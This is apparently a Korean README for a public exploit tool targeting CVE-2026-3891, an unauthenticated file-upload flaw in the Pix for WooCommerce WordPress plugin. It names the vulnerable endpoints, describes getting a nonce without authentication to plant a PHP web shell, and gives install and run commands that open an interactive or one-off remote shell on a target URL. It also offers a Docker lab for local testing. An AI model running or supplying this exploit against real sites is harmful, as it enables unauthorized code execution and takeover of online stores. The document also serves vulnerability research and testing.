
Pix for WooCommerce <= 1.5.0 - 인증되지 않은 임의 파일 업로드 (CVE-2026-3891) PoC
CVE-2026-3891은 Pix for WooCommerce WordPress 플러그인의 인증 없는 임의 파일 업로드 취약점입니다. 이 플러그인은 인증 없이 인증서 파일 업로드를 허용하는 AJAX 엔드포인트(lkn_pix_for_woocommerce_c6_save_settings)를 노출합니다. 두 번째로 노출된 엔드포인트(lkn_pix_for_woocommerce_generate_nonce)를 통해 nonce를 인증 없이 획득할 수 있어, 완전히 인증되지 않은 공격자가 PHP 웹셸을 포함한 임의의 파일을 웹 루트에 직접 업로드할 수 있습니다.
영향받는 버전: payment-gateway-pix-for-woocommerce <= 1.5.0
--command로 일회성 명령을 실행하고 종료git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
대상을 익스플로잇하고 지속적인 인터랙티브 셸 세션에 진입하여 여러 명령을 실행합니다.
python3 CVE-2026-3891.py --url 'https://target.com'

대상에서 단일 명령을 실행하고 출력을 표시합니다. 스크립팅이나 빠른 확인에 유용합니다.
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
단일 명령
취약한 소프트웨어가 포함된 자체 완결형 Docker Compose 환경으로 로컬 테스트용입니다. 자세한 내용은 DOCKER.md를 확인하세요
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 이 도구로 인한 오용이나 손해에 대해 어떠한 책임도 지지 않습니다.